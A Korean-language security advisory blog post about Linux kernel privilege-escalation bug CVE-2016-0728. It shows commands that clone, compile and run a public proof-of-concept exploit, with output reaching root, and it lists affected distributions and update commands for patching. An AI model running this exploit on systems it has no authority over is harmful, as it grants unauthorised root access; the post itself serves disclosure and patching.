원문 : http://thehackernews.com/2016/01/linux-kernel-hacker.html
참고: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
아래는 원문내용을 일부분만 발췌해 번역한 글이니 참고만하시고 자세한 내용은 위에 링크를 통해 확인하세요.
“안드로이드와 리눅스 어플리케이션에서 root 수준의 권한을 획득하는 취약점이 발견되었다.
커널 취약점 CVE-2016-0728
커널 3.8 이상의 32비트/64비트 모든 운영체제에 영향이 있다.
취약점을 이용해 공격할경우 운영체제내의 root 권한을 가지고 개인정보 및 악성앱등을 설치할수 있기에 반드시 패치해서 이용하시기를 바랍니다.”
커널취약점을 가지고 root 권한을 획득하는 예시입니다.
해당코드는 Git 페이지에 공개되어있습니다.
스마일서브에서 제공하는 가상화 1Core / 1G RAM 서버에서 약1시간이내에 root 권한이 획득되었음을 테스트하였습니다.
root@ubuntu# lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 14.04.1 LTS Release: 14.04 Codename: trusty root@ubuntu# uname -a Linux ubuntu 3.19.0-37-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
smileserv@ubuntu:~$ git clone https://gist.github.com/18b1e86d1c0f8531ff8f.git smileserv@ubuntu:~$ cd 18b1e86d1c0f8531ff8f smileserv@ubuntu:~$ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall smileserv@ubuntu:~$./cve_2016_0728 PP1 uid=1000, euid=1000 Increfing... finished increfing forking... finished forking caling revoke... uid=0, euid=0 root@ubuntu# root@ubuntu# whoami root
아래는 취약점에 영향을 받는 리눅스 배포판 목록과 패치 방법입니다.
Red Hat Enterprise Linux 7
CentOS Linux 7
Scientific Linux 7
Debian Linux stable 8.x (jessie)
Debian Linux testing 9.x (stretch)
SUSE Linux Enterprise Desktop 12
SUSE Linux Enterprise Desktop 12 SP1
SUSE Linux Enterprise Server 12
SUSE Linux Enterprise Server 12 SP1
SUSE Linux Enterprise Workstation Extension 12
SUSE Linux Enterprise Workstation Extension 12 SP1
Ubuntu Linux 14.04 LTS (Trusty Tahr)
Ubuntu Linux 15.04 (Vivid Vervet)
Ubuntu Linux 15.10 (Wily Werewolf)
Opensuse Linux LEAP and version 13.2
패치방법은 yum or apt-get 을 통해 업데이트 하면됩니다.
$ sudo apt-get update && sudo apt-get upgrade $ sudo reboot
$ sudo yum update $ sudo reboot